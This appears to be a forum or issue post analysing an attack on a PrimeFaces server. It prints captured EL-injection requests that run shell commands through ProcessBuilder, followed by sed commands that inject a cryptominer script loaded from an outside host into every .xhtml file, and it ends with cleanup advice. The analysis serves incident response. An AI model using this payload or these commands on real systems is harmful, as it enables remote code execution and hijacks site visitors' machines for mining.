Request 1:
${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent().newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs())).loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"".concat(request.getParameter("cmd")).concat("\"]).start(); var is = proc.getInputStream(); var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\"; while (sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);} print(out);"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
CMD 1:
Request 2:
${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent().newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs())).loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"".concat(request.getParameter("cmd")).concat("\"]).start(); var is = proc.getInputStream(); var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\"; while (sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);} print(out);"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
CMD 2:
&cmd=cd ..;find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*jhondi33.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*smkimmo.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*cryptoloot.*<\/script>||g' -e 's|<script.*var miner = new CRLT\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</ui:define>|<scr''ipt src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></s''cript><scr''ipt>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scri''pt></ui:define>|g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</h:body>|<sc''ript src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></scri''pt><sc''ript>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scr''ipt></h:body>|g' 2>&1
Request 3:
${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent().newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs())).loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"".concat(request.getParameter("cmd")).concat("\"]).start(); var is = proc.getInputStream(); var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\"; while (sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);} print(out);"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
CMD 3:
cmd=cd /lib;find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*jhondi33.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*smkimmo.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*cryptoloot.*<\/script>||g' -e 's|<script.*var miner = new CRLT\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</ui:define>|<scr''ipt src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></s''cript><scr''ipt>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scri''pt></ui:define>|g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</h:body>|<sc''ript src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></scri''pt><sc''ript>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scr''ipt></h:body>|g' 2>&1
As you can see, the injected expression runs whatever is passed in the `cmd` URL parameter through `/bin/sh -c`. I will extract those commands now.
As I said, this has been fixed since 6.0, but because the payload executes shell commands via ProcessBuilder, restarting the server with a new PF version does not remove that stuff: the commands above use `sed -i` to write the `<script>` tags directly into the application's `.xhtml` files on disk, so the change persists independently of the PrimeFaces version and has to be cleaned out of those files (and the server checked for anything else those commands may have done).